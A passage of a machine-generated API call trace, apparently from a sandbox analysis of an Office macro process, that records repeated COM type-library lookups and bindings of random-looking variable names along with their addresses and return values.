This=0x665ba50, szNameBuf="JAcQAxGA", lHashVal=0x1042db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.919] IUnknown:Release (This=0x665ba50) returned 0xd [0068.919] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.919] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="JAcQAxGA", lHashVal=0x1042db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.919] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.919] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.919] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="JAcQAxGA", lHashVal=0x1042db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.919] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.919] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.919] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="JAcQAxGA", lHashVal=0x1042db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.919] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a616fa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="JAcQAxGA") returned 9 [0068.919] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="JAcQAxGA", lHashVal=0x1042db, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.919] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.919] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a616fa | out: _Dst=0x67c2d40) returned 0x0 [0068.919] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_JAcQAxGA") returned 0x101a64 [0068.919] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_JAcQAxGA" | out: _Dst="_B_var_JAcQAxGA") returned 0x0 [0068.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_JAcQAxGA") returned 16 [0068.919] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.919] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_JAcQAxGA", lHashVal=0x101a64, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.919] IUnknown:Release (This=0x665ba50) returned 0xd [0068.919] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.919] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_JAcQAxGA", lHashVal=0x101a64, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.919] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.919] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.919] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_JAcQAxGA", lHashVal=0x101a64, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.919] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.919] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.919] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_JAcQAxGA", lHashVal=0x101a64, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.919] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.919] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.919] IUnknown:Release (This=0x665ba50) returned 0xd [0068.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b101fe, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_JAcQAxGA") returned 16 [0068.920] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_JAcQAxGA", lHashVal=0x101a64, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0) returned 0x0 [0068.920] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a616fa | out: _Dst=0x144ec0) returned 0x0 [0068.920] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jcZAAAAo", lHashVal=0x10226f, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6174e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jcZAAAAo") returned 9 [0068.920] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jcZAAAAo", lHashVal=0x10226f, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6174e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jcZAAAAo") returned 9 [0068.920] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jcZAAAAo", lHashVal=0x10226f, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.920] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jcZAAAAo") returned 0x10226f [0068.920] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="jcZAAAAo" | out: _Dst="jcZAAAAo") returned 0x0 [0068.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="jcZAAAAo") returned 9 [0068.920] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.920] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jcZAAAAo", lHashVal=0x10226f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.920] IUnknown:Release (This=0x665ba50) returned 0xd [0068.920] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.920] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jcZAAAAo", lHashVal=0x10226f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.920] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.920] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.920] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jcZAAAAo", lHashVal=0x10226f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.920] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.920] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.920] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jcZAAAAo", lHashVal=0x10226f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.920] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6174e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jcZAAAAo") returned 9 [0068.920] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jcZAAAAo", lHashVal=0x10226f, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.920] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.920] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a6174e | out: _Dst=0x67c2d40) returned 0x0 [0068.920] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jcZAAAAo") returned 0x10fa37 [0068.920] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_jcZAAAAo" | out: _Dst="_B_var_jcZAAAAo") returned 0x0 [0068.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_jcZAAAAo") returned 16 [0068.920] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.920] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jcZAAAAo", lHashVal=0x10fa37, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.921] IUnknown:Release (This=0x665ba50) returned 0xd [0068.921] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.921] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jcZAAAAo", lHashVal=0x10fa37, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.921] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.921] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.921] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jcZAAAAo", lHashVal=0x10fa37, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.921] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.921] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.921] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jcZAAAAo", lHashVal=0x10fa37, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.921] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.921] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.921] IUnknown:Release (This=0x665ba50) returned 0xd [0068.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1022e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_jcZAAAAo") returned 16 [0068.921] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jcZAAAAo", lHashVal=0x10fa37, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.921] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a6174e | out: _Dst=0x144ec0) returned 0x0 [0068.921] ITypeComp:RemoteBind (in: This=0x665ba60, szName="v1XZxBA", lHashVal=0x102113, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6177a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="v1XZxBA") returned 8 [0068.921] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="v1XZxBA", lHashVal=0x102113, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6177a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="v1XZxBA") returned 8 [0068.921] ITypeComp:RemoteBind (in: This=0x665bd30, szName="v1XZxBA", lHashVal=0x102113, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.921] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="v1XZxBA") returned 0x102113 [0068.921] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="v1XZxBA" | out: _Dst="v1XZxBA") returned 0x0 [0068.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="v1XZxBA") returned 8 [0068.921] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.921] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="v1XZxBA", lHashVal=0x102113, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.921] IUnknown:Release (This=0x665ba50) returned 0xd [0068.921] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.921] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="v1XZxBA", lHashVal=0x102113, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.921] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.921] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.921] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="v1XZxBA", lHashVal=0x102113, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.921] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.921] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.922] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="v1XZxBA", lHashVal=0x102113, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.922] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6177a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="v1XZxBA") returned 8 [0068.922] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="v1XZxBA", lHashVal=0x102113, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.922] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.922] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6177a | out: _Dst=0x67c2d40) returned 0x0 [0068.922] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_v1XZxBA") returned 0x102497 [0068.922] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_v1XZxBA" | out: _Dst="_B_var_v1XZxBA") returned 0x0 [0068.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_v1XZxBA") returned 15 [0068.922] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.922] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_v1XZxBA", lHashVal=0x102497, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.922] IUnknown:Release (This=0x665ba50) returned 0xd [0068.922] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.922] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_v1XZxBA", lHashVal=0x102497, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.922] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.922] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.922] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_v1XZxBA", lHashVal=0x102497, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.922] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.922] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.922] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_v1XZxBA", lHashVal=0x102497, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.922] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.922] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.922] IUnknown:Release (This=0x665ba50) returned 0xd [0068.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1025e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_v1XZxBA") returned 15 [0068.922] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_v1XZxBA", lHashVal=0x102497, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x78005a00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x78005a00000000, pDummy=0x0) returned 0x0 [0068.922] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6177a | out: _Dst=0x144ec0) returned 0x0 [0068.922] ITypeComp:RemoteBind (in: This=0x665ba60, szName="bCBAUAA", lHashVal=0x10f590, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a617a2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="bCBAUAA") returned 8 [0068.922] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="bCBAUAA", lHashVal=0x10f590, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a617a2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="bCBAUAA") returned 8 [0068.922] ITypeComp:RemoteBind (in: This=0x665bd30, szName="bCBAUAA", lHashVal=0x10f590, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.922] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bCBAUAA") returned 0x10f590 [0068.923] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="bCBAUAA" | out: _Dst="bCBAUAA") returned 0x0 [0068.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="bCBAUAA") returned 8 [0068.923] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.923] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="bCBAUAA", lHashVal=0x10f590, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.923] IUnknown:Release (This=0x665ba50) returned 0xd [0068.923] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.923] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="bCBAUAA", lHashVal=0x10f590, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.923] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.923] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.923] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="bCBAUAA", lHashVal=0x10f590, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.923] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.923] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.923] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="bCBAUAA", lHashVal=0x10f590, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.923] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a617a2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="bCBAUAA") returned 8 [0068.923] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="bCBAUAA", lHashVal=0x10f590, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.923] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.923] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a617a2 | out: _Dst=0x67c2d40) returned 0x0 [0068.923] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_bCBAUAA") returned 0x10f914 [0068.924] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_bCBAUAA" | out: _Dst="_B_var_bCBAUAA") returned 0x0 [0068.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_bCBAUAA") returned 15 [0068.924] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.924] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_bCBAUAA", lHashVal=0x10f914, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.924] IUnknown:Release (This=0x665ba50) returned 0xd [0068.924] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.924] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_bCBAUAA", lHashVal=0x10f914, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.924] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.924] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.924] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_bCBAUAA", lHashVal=0x10f914, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.924] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.924] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.924] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_bCBAUAA", lHashVal=0x10f914, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.924] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.924] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.924] IUnknown:Release (This=0x665ba50) returned 0xd [0068.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1028e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_bCBAUAA") returned 15 [0068.924] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_bCBAUAA", lHashVal=0x10f914, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0) returned 0x0 [0068.924] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a617a2 | out: _Dst=0x144ec0) returned 0x0 [0068.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a617f6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="A4AA4Zw") returned 8 [0068.924] ITypeComp:RemoteBind (in: This=0x665ba60, szName="A4AA4Zw", lHashVal=0x102a80, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 